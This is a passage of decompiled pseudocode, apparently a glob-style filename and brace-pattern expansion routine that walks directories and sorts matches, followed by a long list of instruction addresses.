                                      				signed int _t355;
                                      				signed int _t356;
                                      				intOrPtr _t360;
                                      				signed int _t366;
                                      				signed int _t367;
                                      				signed int _t368;
                                      				signed int _t369;
                                      				signed int _t370;
                                      				signed int* _t371;
                                      				signed int _t372;
                                      				signed int _t373;
                                      				signed int _t374;
                                      				char* _t375;
                                      				signed int _t376;
                                      				signed int _t377;
                                      				int _t379;
                                      				signed int _t380;
                                      				intOrPtr* _t381;
                                      				signed int _t384;
                                      				signed char* _t385;
                                      				signed char* _t386;
                                      				signed char* _t387;
                                      				signed char* _t388;
                                      				signed char* _t389;
                                      				void* _t390;
                                      				int _t392;
                                      				signed char* _t393;
                                      				intOrPtr _t394;
                                      				void _t395;
                                      				char* _t396;
                                      				signed char* _t397;
                                      				signed int _t399;
                                      				signed int* _t400;
                                      				signed int _t401;
                                      				signed int* _t402;
                                      				intOrPtr* _t404;
                                      				intOrPtr* _t406;
                                      				intOrPtr* _t407;
                                      				intOrPtr* _t408;
                                      				intOrPtr* _t409;
                                      
                                      				_v64 = __eax;
                                      				_v52 = __edx;
                                      				_v60 = __ecx;
                                      				if((__edx & 0x00000004) != 0) {
                                      					_v76 = _t400;
                                      					_t387 = __eax;
                                      					 *_t400 = __eax;
                                      					_t211 = E00408390(strlen(??) + 0x10 >> 4 << 4);
                                      					_t315 =  *_t387 & 0x000000ff;
                                      					_t401 = _t400 - _t211;
                                      					__eflags = _t401;
                                      					_t371 =  &_v112;
                                      					_v72 = _t371;
                                      					while(1) {
                                      						_t37 =  &(_t387[1]); // -1
                                      						_t326 = _t37;
                                      						__eflags = _t315 - 0x7f;
                                      						if(_t315 == 0x7f) {
                                      							goto L22;
                                      						}
                                      						L19:
                                      						__eflags = _t316 - 0x7b;
                                      						if(_t316 == 0x7b) {
                                      							_t315 = _t387[1] & 0x000000ff;
                                      							_t344 = _t387;
                                      							_v68 = _t387;
                                      							_v48 = _t326;
                                      							_t47 =  &(_t344[1]); // -1
                                      							_t397 = _t47;
                                      							_t338 = 1;
                                      							_t212 = _t315;
                                      							_v56 = 0x2c;
                                      							__eflags = _t212 - 0x7b;
                                      							if(__eflags == 0) {
                                      								L34:
                                      								_t212 = _t344[2] & 0x000000ff;
                                      								_t338 = _t338 + 1;
                                      								_t344 = _t397;
                                      								L33:
                                      								_t50 =  &(_t344[1]); // 0x1
                                      								_t397 = _t50;
                                      								__eflags = _t212 - 0x7b;
                                      								if(__eflags == 0) {
                                      									goto L34;
                                      								}
                                      							} else {
                                      							}
                                      							if(__eflags > 0) {
                                      								__eflags = _t212 - 0x7d;
                                      								if(_t212 != 0x7d) {
                                      									__eflags = _t212 - 0x7f;
                                      									if(_t212 != 0x7f) {
                                      										goto L31;
                                      									} else {
                                      										_t212 = _t344[2] & 0x000000ff;
                                      										__eflags = _t212;
                                      										if(_t212 == 0) {
                                      											goto L32;
                                      										} else {
                                      											_t75 =  &(_t344[2]); // 0x1
                                      											_t212 = _t344[3] & 0x000000ff;
                                      											_t344 = _t75;
                                      										}
                                      									}
                                      									goto L33;
                                      								} else {
                                      									_t338 = _t338 - 1;
                                      									__eflags = _t338;
                                      									if(_t338 != 0) {
                                      										goto L31;
                                      									} else {
                                      										__eflags = _v56 - 0x7b;
                                      										_t399 = _v68;
                                      										_t339 = _v48;
                                      										if(_v56 != 0x7b) {
                                      											goto L59;
                                      										} else {
                                      											_v48 = _t371;
                                      											_t372 = _v52;
                                      											while(1) {
                                      												L39:
                                      												_t309 = _v48;
                                      												_t366 = 1;
                                      												__eflags = _t315 - 0x7f;
                                      												if(_t315 == 0x7f) {
                                      													goto L56;
                                      												}
                                      												L41:
                                      												_t399 = _t399 + 1;
                                      												__eflags = _t399;
                                      												_t340 = _t309;
                                      												L42:
                                      												__eflags = _t315 - 0x7d;
                                      												if(_t315 == 0x7d) {
                                      													_t366 = _t366 - 1;
                                      													__eflags = _t366;
                                      													if(_t366 == 0) {
                                      														_t310 = _t399;
                                      														goto L74;
                                      													} else {
                                      														 *_t340 = 0x7d;
                                      														_t309 =  &(_t340[0]);
                                      														goto L55;
                                      													}
                                      													goto L159;
                                      												} else {
                                      													__eflags = _t315 - 0x2c;
                                      													if(_t315 != 0x2c) {
                                      														L60:
                                      														_t309 =  &(_t340[0]);
                                      														__eflags = _t315 - 0x7b;
                                      														if(_t315 != 0x7b) {
                                      															 *_t340 = _t315;
                                      															__eflags = _t315;
                                      															if(_t315 != 0) {
                                      																goto L55;
                                      															} else {
                                      																goto L68;
                                      															}
                                      														} else {
                                      															 *_t340 = 0x7b;
                                      															_t366 = _t366 + 1;
                                      															L55:
                                      															_t315 =  *(_t399 + 1) & 0x000000ff;
                                      															__eflags = _t315 - 0x7f;
                                      															if(_t315 != 0x7f) {
                                      																goto L41;
                                      															} else {
                                      																goto L56;
                                      															}
                                      														}
                                      														goto L159;
                                      													} else {
                                      														__eflags = _t366 - 1;
                                      														if(_t366 != 1) {
                                      															goto L60;
                                      														} else {
                                      															_t369 = _t399;
                                      															_t324 = 1;
                                      															while(1) {
                                      																_t310 = _t369 + 1;
                                      																_t370 =  *(_t369 + 1) & 0x000000ff;
                                      																__eflags = _t370 - 0x7f;
                                      																if(_t370 == 0x7f) {
                                      																	goto L49;
                                      																}
                                      																L47:
                                      																L69:
                                      																__eflags = _t370 - 0x7b;
                                      																if(_t370 == 0x7b) {
                                      																	_t324 = _t324 + 1;
                                      																	_t369 = _t310;
                                      																	_t310 = _t369 + 1;
                                      																	_t370 =  *(_t369 + 1) & 0x000000ff;
                                      																	__eflags = _t370 - 0x7f;
                                      																	if(_t370 == 0x7f) {
                                      																		goto L49;
                                      																	}
                                      																	goto L51;
                                      																} else {
                                      																	__eflags = _t370 - 0x7d;
                                      																	if(_t370 == 0x7d) {
                                      																		_t324 = _t324 - 1;
                                      																		__eflags = _t324;
                                      																		if(_t324 == 0) {
                                      																			L74:
                                      																			_t311 = _t310 + 1;
                                      																			__eflags = _t311;
                                      																			do {
                                      																				_t367 =  *_t311 & 0x000000ff;
                                      																				_t340 =  &(_t340[0]);
                                      																				_t311 = _t311 + 1;
                                      																				 *(_t340 - 1) = _t367;
                                      																				__eflags = _t367;
                                      																			} while (_t367 != 0);
                                      																			_t368 = _t372;
                                      																			_t372 = _t372 | 0x00000001;
                                      																			 *_t401 = _a4;
                                      																			_t314 = E00408D90(_v72, _v60, _t368);
                                      																			__eflags = _t314 - 1;
                                      																			if(_t314 == 1) {
                                      																				L68:
                                      																				_v48 = 1;
                                      																				goto L51;
                                      																			} else {
                                      																				__eflags =  *_t399 - 0x2c;
                                      																				if( *_t399 != 0x2c) {
                                      																					_v48 = _t314;
                                      																					goto L51;
                                      																				} else {
                                      																					_t315 =  *(_t399 + 1) & 0x000000ff;
                                      																					goto L39;
                                      																				}
                                      																			}
                                      																		} else {
                                      																			_t369 = _t310;
                                      																			while(1) {
                                      																				_t310 = _t369 + 1;
                                      																				_t370 =  *(_t369 + 1) & 0x000000ff;
                                      																				__eflags = _t370 - 0x7f;
                                      																				if(_t370 == 0x7f) {
                                      																					goto L49;
                                      																				}
                                      																				goto L47;
                                      																			}
                                      																		}
                                      																	} else {
                                      																		__eflags = _t370;
                                      																		if(_t370 == 0) {
                                      																			L50:
                                      																			 *_t340 = 0;
                                      																			_v48 = 1;
                                      																			goto L51;
                                      																		} else {
                                      																			_t369 = _t310;
                                      																			while(1) {
                                      																				_t310 = _t369 + 1;
                                      																				_t370 =  *(_t369 + 1) & 0x000000ff;
                                      																				__eflags = _t370 - 0x7f;
                                      																				if(_t370 == 0x7f) {
                                      																					goto L49;
                                      																				}
                                      																				goto L47;
                                      																				while(1) {
                                      																					L49:
                                      																					__eflags =  *(_t310 + 1);
                                      																					if( *(_t310 + 1) == 0) {
                                      																						goto L50;
                                      																					}
                                      																					_t370 =  *(_t310 + 2) & 0x000000ff;
                                      																					_t310 = _t310 + 2;
                                      																					__eflags = _t370 - 0x7f;
                                      																					if(_t370 != 0x7f) {
                                      																						goto L69;
                                      																					} else {
                                      																						continue;
                                      																					}
                                      																					goto L51;
                                      																				}
                                      																				goto L50;
                                      																			}
                                      																		}
                                      																	}
                                      																}
                                      																goto L159;
                                      															}
                                      														}
                                      													}
                                      												}
                                      												L51:
                                      												goto L52;
                                      												L56:
                                      												_t323 =  *(_t399 + 2) & 0x000000ff;
                                      												 *_t309 = 0x7f;
                                      												_t340 =  &(_t309[0]);
                                      												_t309[0] = _t323;
                                      												__eflags = _t323;
                                      												if(_t323 == 0) {
                                      													_t309[0] = 0;
                                      													goto L68;
                                      												} else {
                                      													_t315 =  *(_t399 + 3) & 0x000000ff;
                                      													_t399 = _t399 + 3;
                                      													goto L42;
                                      												}
                                      												goto L159;
                                      											}
                                      										}
                                      									}
                                      								}
                                      							} else {
                                      								__eflags = _t212;
                                      								if(_t212 == 0) {
                                      									_t339 = _v48;
                                      									L59:
                                      									 *_t371 = 0x7b;
                                      									_t387 = _t339;
                                      									_t371 =  &(_t371[0]);
                                      									while(1) {
                                      										_t37 =  &(_t387[1]); // -1
                                      										_t326 = _t37;
                                      										__eflags = _t315 - 0x7f;
                                      										if(_t315 == 0x7f) {
                                      											goto L22;
                                      										}
                                      										goto L19;
                                      									}
                                      								} else {
                                      									__eflags = _t212 - 0x2c;
                                      									if(_t212 != 0x2c) {
                                      										L31:
                                      										_t212 = _t344[2] & 0x000000ff;
                                      										L32:
                                      										_t344 = _t397;
                                      									} else {
                                      										__eflags = _t338 - 1;
                                      										if(_t338 == 1) {
                                      											_t212 = _t344[2] & 0x000000ff;
                                      											_v56 = 0x7b;
                                      											_t344 = _t397;
                                      										} else {
                                      											goto L31;
                                      										}
                                      									}
                                      									goto L33;
                                      								}
                                      							}
                                      						} else {
                                      							L20:
                                      							 *_t371 = _t316;
                                      							_t213 =  &(_t371[0]);
                                      							__eflags = _t316;
                                      							if(_t316 == 0) {
                                      								_t400 = _v76;
                                      								goto L1;
                                      							} else {
                                      								_t316 = _t387[1] & 0x000000ff;
                                      								_t387 = _t326;
                                      								_t371 = _t213;
                                      								_t40 =  &(_t387[1]); // 0x2
                                      								_t326 = _t40;
                                      								__eflags = _t316 - 0x7f;
                                      								if(_t316 != 0x7f) {
                                      									goto L19;
                                      								} else {
                                      									goto L22;
                                      								}
                                      							}
                                      						}
                                      						goto L159;
                                      						L22:
                                      						_t316 = _t387[1] & 0x000000ff;
                                      						 *_t371 = 0x7f;
                                      						__eflags = _t316;
                                      						if(_t316 != 0) {
                                      							_t371[0] = _t316;
                                      							_t387 =  &(_t387[2]);
                                      							_t315 =  *_t387 & 0x000000ff;
                                      							_t371 =  &(_t371[0]);
                                      							continue;
                                      						} else {
                                      							_t42 =  &(_t387[2]); // 0x2
                                      							_t371 =  &(_t371[0]);
                                      							_t387 = _t326;
                                      							_t326 = _t42;
                                      							goto L20;
                                      						}
                                      						goto L159;
                                      					}
                                      				} else {
                                      					L1:
                                      					_t373 = _v64;
                                      					_v72 = _t400;
                                      					 *_t400 = _t373;
                                      					_t6 = strlen(??) + 1; // 0x1
                                      					_t402 = _t400 - E00408390(_t214 + 0x10 >> 4 << 4);
                                      					_v116 = _t6;
                                      					_v120 = _t373;
                                      					 *_t402 =  &_v112;
                                      					 *_t402 = memcpy(??, ??, ??); // executed
                                      					_t221 = E00409790(_t220); // executed
                                      					_v32 = 0;
                                      					_v68 = _t221;
                                      					_t374 = _t221;
                                      					_t223 = E00408D40( &_v44);
                                      					_v48 = _t223;
                                      					if(_t223 != 0) {
                                      						L79:
                                      						return _v48;
                                      					} else {
                                      						if(_t374 == 0 || E00408BF0(_t374, _v52) == 0) {
                                      							_t388 = _v68;
                                      							_t317 = _t402;
                                      							 *_t402 = _t388;
                                      							_t404 = _t402 - E00408390(strlen(??) + 0x10 >> 4 << 4);
                                      							_t346 = _t388;
                                      							_t375 =  &_v112;
                                      							_t327 = _t375;
                                      							while(1) {
                                      								L6:
                                      								_t230 =  *_t346 & 0x000000ff;
                                      								_t389 =  &(_t346[1]);
                                      								if(_t230 == 0x7f) {
                                      									break;
                                      								}
                                      								_t327 = _t327 + 1;
                                      								_t346 = _t389;
                                      								 *(_t327 - 1) = _t230;
                                      								__eflags = _t230;
                                      								if(_t230 != 0) {
                                      									continue;
                                      								}
                                      								L8:
                                      								 *_t404 = _t375;
                                      								L00408484();
                                      								_v48 = 1;
                                      								_t402 = _t317;
                                      								if(_t230 == 0) {
                                      									goto L79;
                                      								} else {
                                      									_v48 = E00408C90(_t230,  &_v44);
                                      									goto L10;
                                      								}
                                      								goto L159;
                                      							}
                                      							_t230 = _t346[1] & 0x000000ff;
                                      							_t327 = _t327 + 1;
                                      							_t346 =  &(_t346[2]);
                                      							 *(_t327 - 1) = _t230;
                                      							if(_t230 != 0) {
                                      								goto L6;
                                      							}
                                      							goto L8;
                                      						} else {
                                      							 *_t402 =  &_v44;
                                      							_v48 = E00408D90(_v68, _v60, _v52 | 0x00000080);
                                      							L10:
                                      							if(_v48 != 0) {
                                      								goto L79;
                                      							} else {
                                      								_t232 =  *(_v64 + 1) & 0x000000ff;
                                      								if(_t232 == 0x2f || _t232 == 0x5c) {
                                      									L85:
                                      									 *_t402 = _v68;
                                      									_t234 = strlen(??);
                                      									_t376 = _v64;
                                      									_t348 = _v64;
                                      									_t319 = _t376 + _t234;
                                      									_t235 =  *_t319 & 0x000000ff;
                                      									__eflags = _t376 - _t319;
                                      									if(_t376 >= _t319) {
                                      										L90:
                                      										__eflags = _t235 - 0x2f;
                                      										if(_t235 == 0x2f) {
                                      											goto L93;
                                      										} else {
                                      											__eflags = _t235 - 0x5c;
                                      											if(_t235 == 0x5c) {
                                      												goto L93;
                                      											} else {
                                      												_v101 = 0x5c;
                                      											}
                                      										}
                                      									} else {
                                      										while(1) {
                                      											__eflags = _t235 - 0x2f;
                                      											if(_t235 == 0x2f) {
                                      												goto L93;
                                      											}
                                      											__eflags = _t235 - 0x5c;
                                      											if(_t235 == 0x5c) {
                                      												goto L90;
                                      											} else {
                                      												_t319 = _t319 - 1;
                                      												_t235 =  *_t319 & 0x000000ff;
                                      												__eflags = _t348 - _t319;
                                      												if(_t348 != _t319) {
                                      													continue;
                                      												} else {
                                      													goto L90;
                                      												}
                                      											}
                                      											goto L96;
                                      										}
                                      										do {
                                      											do {
                                      												L93:
                                      												_t319 =  &(_t319[1]);
                                      												_t349 = _t235;
                                      												_t235 =  *_t319 & 0x000000ff;
                                      												__eflags = _t235 - 0x2f;
                                      											} while (_t235 == 0x2f);
                                      											__eflags = _t235 - 0x5c;
                                      										} while (_t235 == 0x5c);
                                      										_v101 = _t349;
                                      									}
                                      									goto L96;
                                      								} else {
                                      									_t292 = _v68;
                                      									if( *_t292 != 0x2e ||  *((char*)(_t292 + 1)) != 0) {
                                      										goto L85;
                                      									} else {
                                      										if((_v52 & 0x00000010) != 0) {
                                      											_t385 = _v64;
                                      											_t294 = E00408BF0(_t385, _v52);
                                      											_v48 = _t294;
                                      											__eflags = _t294;
                                      											if(_t294 == 0) {
                                      												 *_t402 = _t385;
                                      												_t322 = _t402;
                                      												_t409 = _t402 - E00408390(strlen(??) + 0x10 >> 4 << 4);
                                      												_t336 = _t385;
                                      												_t396 =  &_v112;
                                      												_t360 = _t396;
                                      												do {
                                      													_t300 =  *_t336 & 0x000000ff;
                                      													_t199 =  &(_t336[1]); // 0x1
                                      													_t386 = _t199;
                                      													__eflags = _t300 - 0x7f;
                                      													if(_t300 != 0x7f) {
                                      														_t336 = _t386;
                                      													} else {
                                      														_t300 = _t336[1] & 0x000000ff;
                                      														_t336 =  &(_t336[2]);
                                      													}
                                      													_t360 = _t360 + 1;
                                      													 *(_t360 - 1) = _t300;
                                      													__eflags = _t300;
                                      												} while (_t300 != 0);
                                      												 *_t409 = _t396;
                                      												L00408484();
                                      												_t402 = _t322;
                                      												__eflags = _t300;
                                      												if(_t300 == 0) {
                                      													goto L130;
                                      												} else {
                                      													__eflags = _a4;
                                      													if(_a4 == 0) {
                                      														goto L130;
                                      													} else {
                                      														E00408C90(_t300, _a4);
                                      														_t377 = _v36;
                                      													}
                                      												}
                                      											} else {
                                      												_t319 = _v64;
                                      												goto L16;
                                      											}
                                      										} else {
                                      											L16:
                                      											_v101 = 0x5c;
                                      											_v68 = 0;
                                      											L96:
                                      											_t377 = _v36;
                                      											_v48 = 2;
                                      											_t236 =  *_t377;
                                      											if(_t236 != 0) {
                                      												_v76 = _t319;
                                      												_t320 = _t377;
                                      												_v64 = _v52 & 0x00008000;
                                      												do {
                                      													if(_v48 == 1) {
                                      														L102:
                                      														_v48 = 1;
                                      													} else {
                                      														 *_t402 = _t236;
                                      														_t242 = E00409D60();
                                      														_v56 = _t242;
                                      														if(_t242 == 0) {
                                      															__eflags = _v52 & 0x00000004;
                                      															if((_v52 & 0x00000004) != 0) {
                                      																goto L102;
                                      															} else {
                                      																_t380 = _v60;
                                      																__eflags = _t380;
                                      																if(_t380 != 0) {
                                      																	L0040A388();
                                      																	_v120 =  *_t242;
                                      																	 *_t402 =  *_t320;
                                      																	_t245 =  *_t380();
                                      																	__eflags = _t245;
                                      																	if(_t245 != 0) {
                                      																		goto L102;
                                      																	}
                                      																}
                                      															}
                                      														} else {
                                      															_v80 = 0;
                                      															if(_v68 != 0) {
                                      																 *_t402 =  *_t320;
                                      																_v80 = strlen(??);
                                      															}
                                      															_v84 = 0;
                                      															_v100 = _v80 + 2;
                                      															while(1) {
                                      																L109:
                                      																 *_t402 = _v56;
                                      																_t250 = E00409F60();
                                      																_t390 = _t250;
                                      																if(_t250 == 0) {
                                      																	break;
                                      																}
                                      																if(_v64 == 0 ||  *((intOrPtr*)(_t390 + 8)) == 0x10) {
                                      																	_t118 = _t390 + 0xc; // 0xc
                                      																	_t379 = _t118;
                                      																	if(E004089C0(_v76, _v52, _t379) != 0) {
                                      																		continue;
                                      																	} else {
                                      																		_t332 =  *(_t390 + 6) & 0x0000ffff;
                                      																		_v88 = _t402;
                                      																		_t406 = _t402 - E00408390(_t332 + _v100 + 0xf >> 4 << 4);
                                      																		_t352 =  &_v112;
                                      																		_v92 = _t352;
                                      																		_t263 = _t352;
                                      																		if(_v80 != 0) {
                                      																			_t392 = _v80;
                                      																			_v108 = _t332;
                                      																			 *_t406 = _t352;
                                      																			_v116 = _t392;
                                      																			_v120 =  *_t320;
                                      																			_v96 = _t352;
                                      																			memcpy(??, ??, ??);
                                      																			_t266 =  *(_t406 + _t392 + 0xb) & 0x000000ff;
                                      																			_t352 = _v96;
                                      																			_t332 = _v108;
                                      																			__eflags = _t266 - 0x2f;
                                      																			if(_t266 == 0x2f) {
                                      																				L147:
                                      																				_t263 = _v80 + _t352;
                                      																				goto L114;
                                      																			} else {
                                      																				__eflags = _t266 - 0x5c;
                                      																				if(_t266 == 0x5c) {
                                      																					goto L147;
                                      																				} else {
                                      																					_t395 = _v80;
                                      																					 *((char*)(_t352 + _t395)) = _v101 & 0x000000ff;
                                      																					_t263 = _t352 + _t395 + 1;
                                      																					goto L114;
                                      																				}
                                      																			}
                                      																			goto L129;
                                      																		}
                                      																		L114:
                                      																		_v96 = _t352;
                                      																		_v116 = _t332 + 1;
                                      																		_v120 = _t379;
                                      																		_t381 = _t406;
                                      																		 *_t406 = _t263;
                                      																		memcpy(??, ??, ??);
                                      																		 *_t406 = _v96;
                                      																		_t273 = E00408390(strlen(??) + 0x10 >> 4 << 4);
                                      																		_t393 = _v92;
                                      																		_t407 = _t406 - _t273;
                                      																		_t274 =  &_v112;
                                      																		_v96 = _t274;
                                      																		_t354 = _t274;
                                      																		while(1) {
                                      																			L116:
                                      																			_t275 =  *_t393 & 0x000000ff;
                                      																			_t334 =  &(_t393[1]);
                                      																			if(_t275 == 0x7f) {
                                      																				break;
                                      																			}
                                      																			_t354 = _t354 + 1;
                                      																			_t393 = _t334;
                                      																			 *(_t354 - 1) = _t275;
                                      																			__eflags = _t275;
                                      																			if(_t275 != 0) {
                                      																				continue;
                                      																			}
                                      																			L118:
                                      																			_t276 = _v96;
                                      																			 *_t407 = _t276;
                                      																			L00408484();
                                      																			_t408 = _t381;
                                      																			_t394 = _t276;
                                      																			if(_t276 == 0) {
                                      																				_v48 = 3;
                                      																			} else {
                                      																				_v48 = _v48 & (0 | _v48 == 0x00000002) - 0x00000001;
                                      																				if((_v52 & 0x00000040) == 0) {
                                      																					_t384 = _v84;
                                      																					__eflags = _t384;
                                      																					if(_t384 == 0) {
                                      																						 *_t408 = 0xc;
                                      																						_t280 = malloc(??);
                                      																						_v84 = _t280;
                                      																						__eflags = _t280;
                                      																						if(_t280 != 0) {
                                      																							_t281 = _v84;
                                      																							 *((intOrPtr*)(_t281 + 8)) = _t394;
                                      																							 *(_t281 + 4) = 0;
                                      																							 *_t281 = 0;
                                      																						}
                                      																					} else {
                                      																						_v92 = _t320;
                                      																						_t321 = _v52 & 0x00004000;
                                      																						while(1) {
                                      																							_t284 =  *(_t384 + 8);
                                      																							 *_t408 = _t394;
                                      																							_v120 = _t284;
                                      																							__eflags = _t321;
                                      																							if(_t321 != 0) {
                                      																								_t284 = strcoll();
                                      																							} else {
                                      																								L0040A418();
                                      																							}
                                      																							_t335 =  *_t384;
                                      																							_t355 =  *(_t384 + 4);
                                      																							__eflags = _t284;
                                      																							if(_t284 <= 0) {
                                      																								_t355 = _t335;
                                      																							}
                                      																							__eflags = _t355;
                                      																							if(_t355 == 0) {
                                      																								break;
                                      																							}
                                      																							_t384 = _t355;
                                      																						}
                                      																						_t320 = _v92;
                                      																						_v92 = _t284;
                                      																						 *_t408 = 0xc;
                                      																						_t285 = malloc(??);
                                      																						_t356 = _v92;
                                      																						__eflags = _t285;
                                      																						if(_t285 != 0) {
                                      																							 *((intOrPtr*)(_t285 + 8)) = _t394;
                                      																							 *(_t285 + 4) = 0;
                                      																							 *_t285 = 0;
                                      																							__eflags = _t356;
                                      																							if(_t356 <= 0) {
                                      																								 *_t384 = _t285;
                                      																							} else {
                                      																								 *(_t384 + 4) = _t285;
                                      																							}
                                      																						}
                                      																					}
                                      																				} else {
                                      																					if(_a4 != 0) {
                                      																						E00408C90(_t394, _a4);
                                      																					}
                                      																				}
                                      																			}
                                      																			_t402 = _v88;
                                      																			goto L109;
                                      																		}
                                      																		_t288 = _t393[1] & 0x000000ff;
                                      																		_t354 = _t354 + 1;
                                      																		_t393 =  &(_t393[2]);
                                      																		 *(_t354 - 1) = _t288;
                                      																		if(_t288 != 0) {
                                      																			goto L116;
                                      																		}
                                      																		goto L118;
                                      																	}
                                      																} else {
                                      																	continue;
                                      																}
                                      																goto L129;
                                      															}
                                      															 *_t402 = _v56;
                                      															E00409FB0();
                                      															__eflags = _v84;
                                      															if(_v84 != 0) {
                                      																E00408CF0(_v84, _a4);
                                      															}
                                      														}
                                      													}
                                      													goto L103;
                                      													L103:
                                      													_t239 =  *_t320;
                                      													_t320 =  &(_t320[1]);
                                      													 *_t402 = _t239;
                                      													E00408660();
                                      													_t236 =  *_t320;
                                      													__eflags = _t236;
                                      												} while (_t236 != 0);
                                      												L130:
                                      												_t377 = _v36;
                                      											}
                                      										}
                                      									}
                                      								}
                                      								L129:
                                      								 *_t402 = _t377;
                                      								E00408660();
                                      								L52:
                                      								return _v48;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				L159:
                                      			}
                                      0x0040909b
                                      0x00409108
                                      0x00000000
                                      0x0040909d
                                      0x0040909d
                                      0x004090a1
                                      0x00000000
                                      0x004090a1
                                      0x00000000
                                      0x0040909b
                                      0x00408fe3
                                      0x00408fd7
                                      0x00408fcb
                                      0x00408f8a
                                      0x00408f8a
                                      0x00408f8c
                                      0x004090b0
                                      0x004090b3
                                      0x004090b3
                                      0x004090b6
                                      0x004090b8
                                      0x00408f0f
                                      0x00408f0f
                                      0x00408f0f
                                      0x00408f12
                                      0x00408f15
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f15
                                      0x00408f92
                                      0x00408f92
                                      0x00408f94
                                      0x00408f9f
                                      0x00408f9f
                                      0x00408fa3
                                      0x00408fa3
                                      0x00408f96
                                      0x00408f96
                                      0x00408f99
                                      0x004091b0
                                      0x004091b4
                                      0x004091bb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f99
                                      0x00000000
                                      0x00408f94
                                      0x00408f8c
                                      0x00408f1c
                                      0x00408f1c
                                      0x00408f1c
                                      0x00408f1e
                                      0x00408f21
                                      0x00408f23
                                      0x004091c2
                                      0x00000000
                                      0x00408f29
                                      0x00408f29
                                      0x00408f2d
                                      0x00408f2f
                                      0x00408f31
                                      0x00408f31
                                      0x00408f34
                                      0x00408f37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f37
                                      0x00408f23
                                      0x00000000
                                      0x00408f39
                                      0x00408f39
                                      0x00408f3d
                                      0x00408f40
                                      0x00408f42
                                      0x00408f50
                                      0x00408f53
                                      0x00408f56
                                      0x00408f59
                                      0x00000000
                                      0x00408f44
                                      0x00408f44
                                      0x00408f47
                                      0x00408f4a
                                      0x00408f4c
                                      0x00000000
                                      0x00408f4c
                                      0x00000000
                                      0x00408f42
                                      0x00408dab
                                      0x00408dab
                                      0x00408dab
                                      0x00408dae
                                      0x00408db1
                                      0x00408db9
                                      0x00408dca
                                      0x00408dd0
                                      0x00408dd4
                                      0x00408dd8
                                      0x00408de0
                                      0x00408de3
                                      0x00408de8
                                      0x00408def
                                      0x00408df2
                                      0x00408df7
                                      0x00408dfc
                                      0x00408e01
                                      0x00409188
                                      0x00409195
                                      0x00408e07
                                      0x00408e09
                                      0x00408e1d
                                      0x00408e20
                                      0x00408e22
                                      0x00408e38
                                      0x00408e3a
                                      0x00408e3c
                                      0x00408e40
                                      0x00408e54
                                      0x00408e54
                                      0x00408e54
                                      0x00408e57
                                      0x00408e5c
                                      0x00000000
                                      0x00000000
                                      0x00408e48
                                      0x00408e4b
                                      0x00408e4d
                                      0x00408e50
                                      0x00408e52
                                      0x00000000
                                      0x00000000
                                      0x00408e6f
                                      0x00408e6f
                                      0x00408e72
                                      0x00408e77
                                      0x00408e7e
                                      0x00408e82
                                      0x00000000
                                      0x00408e88
                                      0x00408e90
                                      0x00000000
                                      0x00408e90
                                      0x00000000
                                      0x00408e82
                                      0x00408e5e
                                      0x00408e62
                                      0x00408e65
                                      0x00408e68
                                      0x00408e6d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409416
                                      0x0040941c
                                      0x0040942d
                                      0x00408e93
                                      0x00408e98
                                      0x00000000
                                      0x00408e9e
                                      0x00408ea1
                                      0x00408ea7
                                      0x004091e0
                                      0x004091e3
                                      0x004091e6
                                      0x004091eb
                                      0x004091ee
                                      0x004091f1
                                      0x004091f4
                                      0x004091f7
                                      0x004091f9
                                      0x00409212
                                      0x00409212
                                      0x00409214
                                      0x00000000
                                      0x00409216
                                      0x00409216
                                      0x00409218
                                      0x00000000
                                      0x0040921a
                                      0x0040921a
                                      0x0040921a
                                      0x00409218
                                      0x00409200
                                      0x00409200
                                      0x00409200
                                      0x00409202
                                      0x00000000
                                      0x00000000
                                      0x00409204
                                      0x00409206
                                      0x00000000
                                      0x00409208
                                      0x00409208
                                      0x0040920b
                                      0x0040920e
                                      0x00409210
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409210
                                      0x00000000
                                      0x00409206
                                      0x00409220
                                      0x00409220
                                      0x00409220
                                      0x00409220
                                      0x00409223
                                      0x00409225
                                      0x00409228
                                      0x00409228
                                      0x0040922c
                                      0x0040922c
                                      0x00409230
                                      0x00409230
                                      0x00000000
                                      0x00408eb5
                                      0x00408eb5
                                      0x00408ebb
                                      0x00000000
                                      0x00408ecb
                                      0x00408ecf
                                      0x00409584
                                      0x0040958c
                                      0x00409591
                                      0x00409594
                                      0x00409596
                                      0x004095a0
                                      0x004095a3
                                      0x004095b8
                                      0x004095ba
                                      0x004095bc
                                      0x004095c0
                                      0x004095d4
                                      0x004095d4
                                      0x004095d7
                                      0x004095d7
                                      0x004095da
                                      0x004095dc
                                      0x004095c4
                                      0x004095de
                                      0x004095de
                                      0x004095e2
                                      0x004095e2
                                      0x004095c6
                                      0x004095c9
                                      0x004095cc
                                      0x004095cc
                                      0x0040945b
                                      0x0040945e
                                      0x00409463
                                      0x00409465
                                      0x00409467
                                      0x00000000
                                      0x00409469
                                      0x0040946c
                                      0x0040946e
                                      0x00000000
                                      0x00409470
                                      0x00409473
                                      0x0040947b
                                      0x0040947b
                                      0x0040946e
                                      0x00409598
                                      0x00409598
                                      0x00000000
                                      0x00409598
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ed9
                                      0x00409233
                                      0x00409233
                                      0x00409236
                                      0x0040923d
                                      0x00409241
                                      0x0040924a
                                      0x0040924d
                                      0x00409255
                                      0x004092a6
                                      0x004092aa
                                      0x00409288
                                      0x00409288
                                      0x004092ac
                                      0x004092ac
                                      0x004092af
                                      0x004092b4
                                      0x004092b9
                                      0x00409260
                                      0x00409264
                                      0x00000000
                                      0x00409266
                                      0x00409266
                                      0x00409269
                                      0x0040926b
                                      0x0040926d
                                      0x00409274
                                      0x0040927a
                                      0x0040927d
                                      0x0040927f
                                      0x00409281
                                      0x00000000
                                      0x00000000
                                      0x00409281
                                      0x0040926b
                                      0x004092bb
                                      0x004092be
                                      0x004092c7
                                      0x004092cb
                                      0x004092d3
                                      0x004092d3
                                      0x004092d9
                                      0x004092e3
                                      0x004092f0
                                      0x004092f0
                                      0x004092f3
                                      0x004092f6
                                      0x004092fb
                                      0x004092ff
                                      0x00000000
                                      0x00000000
                                      0x0040930a
                                      0x00409312
                                      0x00409312
                                      0x00409324
                                      0x00000000
                                      0x00409326
                                      0x00409326
                                      0x0040932d
